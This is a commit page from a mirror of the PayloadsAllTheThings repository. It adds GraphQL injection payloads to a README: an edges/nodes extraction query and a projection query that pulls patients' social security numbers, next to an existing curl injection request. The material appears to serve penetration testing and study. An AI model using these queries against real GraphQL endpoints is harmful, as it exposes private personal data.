Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 17:02:53 +01:00
Code Issues Projects Releases Wiki Activity

GraphQL - Projection + Edges/Nodes

Browse source
This commit is contained in:
Swissky 2019-07-05 21:34:04 +02:00
parent f6564869f0
commit 6cecb8fa7a
1 changed files with 30 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

31
GraphQL Injection/README.md
View file

@ -10,6 +10,8 @@
* [Identify an injection point](#identify-an-injection-point) * [Identify an injection point](#identify-an-injection-point)
* [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection) * [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
* [Extract data](#extract-data) * [Extract data](#extract-data)
* [Extract data using edges/nodes](#extract-data-using-edges-nodes)
* [Extract data using projections](#extract-data-using-projections)
* [Enumerate the types' definition](#enumerate-the-type-definition) * [Enumerate the types' definition](#enumerate-the-type-definition)
* [Use mutations](#use-mutations) * [Use mutations](#use-mutations)
* [NOSQL injection](#nosql-injection) * [NOSQL injection](#nosql-injection)
@ -159,6 +161,32 @@ example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true) ![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
### Extract data using edges/nodes
```json
{
"query": "query {
teams{
total_count,edges{
node{
id,_id,about,handle,state
}
}
}
}"
}
```
### Extract data using projections
:warning: Dont forget to escape the " inside the **options**.
```json
{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
```
### Enumerate the types' definition ### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
@ -214,4 +242,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/) * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)